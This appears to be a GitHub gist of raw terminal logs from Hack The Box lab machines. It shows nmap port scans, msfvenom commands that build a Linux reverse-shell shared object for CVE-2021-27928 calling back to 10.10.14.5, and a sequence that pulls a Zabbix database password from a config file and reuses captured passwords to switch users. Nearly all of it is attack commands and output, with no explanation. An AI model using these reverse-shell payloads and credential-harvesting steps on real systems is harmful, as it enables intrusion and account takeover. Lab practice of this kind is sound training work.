Skip to content

Instantly share code, notes, and snippets.

View oxtd's full-sized avatar
💭
I may be slow to respond.

Tushar De oxtd

💭
I may be slow to respond.
View GitHub Profile
$ export IP=10.10.11.155
$ sudo nmap $IP -p- -Pn --min-rate 10000 --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-18 08:51 IST
Nmap scan report for 10.10.11.155
Host is up (0.22s latency).
Not shown: 64931 closed tcp ports (reset), 600 filtered tcp ports (no-response)
$ export IP=10.10.11.155
$ sudo nmap $IP -p- -Pn --min-rate 10000 --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-18 08:51 IST
Nmap scan report for 10.10.11.155
Host is up (0.22s latency).
Not shown: 64931 closed tcp ports (reset), 600 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
$ echo "10.10.11.119 overflow.htb" | sudo tee -a /etc/hosts
10.10.11.119 overflow.htb
$ export IP=10.10.11.119
$ sudo nmap $IP -sCV -oA Nmap/all-detail-scan -Pn -p- --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 12:56 IST
Nmap scan report for 10.10.11.119
Host is up (0.22s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f elf-so -o CVE-2021-27928.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: CVE-2021-27928.so
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=80 -f elf-so -o CVE-2021-27928.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: CVE-2021-27928.so
ipmi-svc@shibboleth:/tmp$ mysql -u zabbix -p -D zabbix
mysql -u zabbix -p -D zabbix
Enter password: bloooarskybluh
Reading table information for completion of table and column names
You can turn off
ipmi-svc@shibboleth:/tmp$ cat /etc/zabbix/zabbix_server.conf | grep -i password
cat /etc/zabbix/zabbix_server.conf | grep -i password
### Option: DBPassword
# Database password.
# Comment this line if no password is used.
DBPassword=bloooarskybluh
zabbix@shibboleth:/home$ su ipmi-svc
su ipmi-svc
Password: ilovepumkinpie1
ipmi-svc@shibboleth:/home$ whoami
whoami
ipmi-svc
ipmi-svc@shibboleth:/home$